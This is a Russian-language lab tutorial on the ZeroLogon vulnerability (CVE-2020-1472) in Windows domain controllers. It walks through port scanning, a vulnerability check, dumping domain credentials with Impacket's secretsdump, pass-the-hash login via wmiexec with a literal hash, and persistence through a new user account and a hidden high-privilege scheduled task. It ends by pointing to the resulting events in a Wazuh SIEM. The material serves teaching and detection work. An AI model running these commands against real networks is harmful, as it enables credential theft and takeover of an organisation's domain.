
Объяснение и демонстрация уязвимости ZeroLogon (CVE-2020-1472)
Объяснение и демонстрация уязвимости ZeroLogon (CVE-2020-1472)
Цель этой лабораторной работы строго образовательная. Ее выполнение не рекомендуется в производственных средах или в средах, которые вам не принадлежат.
Контекст уязвимости
Эта уязвимость позволяет киберпреступнику получить контроль над контроллером домена (DC). Это достигается путем изменения или удаления пароля учетной записи службы на контроллере. Злоумышленник может просто вызвать отказ в обслуживании или получить контроль и завладеть всей сетью. В августе 2020 года Microsoft выпустила патч.
Затронутый компонент: Microsoft Netlogon Remote Protocol (MS-NRPC)
Затронутые версии Windows:
Клонировать репозитории
Если выполнять локально!
На AWS также это возможно с этими образами (осторожно с оплатой)
Дополнительно: учетная запись в Wazuh для анализа событий SIEM.
Подсказка: В Kali Linux служба SSH отключена по умолчанию — ее необходимо запустить вручную.
Перед проверкой уязвимости сервера можно использовать nmap для просмотра открытых портов:
nmap -sS -T4 -F --open -n ip
Используя CVE-2020-1472 - Проверка, уязвим ли целевой сервер. Выполните команду:
zerologon_tester.py <dc-name> <dc-ip>
Инструмент secretdump — это утилита из Impacket
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Если все пройдет хорошо, мы сможем войти с помощью хэша Что такое атака pass-the-hash?
Теперь осталось только создать постоянство! Можно нового пользователя!
net user coringa Batman2025 /add
Готово! Пользователь успешно создан!
Также можно создать задачу!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Можно увидеть создание пользователей и события, связанные с pass-the-hash и созданием пользователей!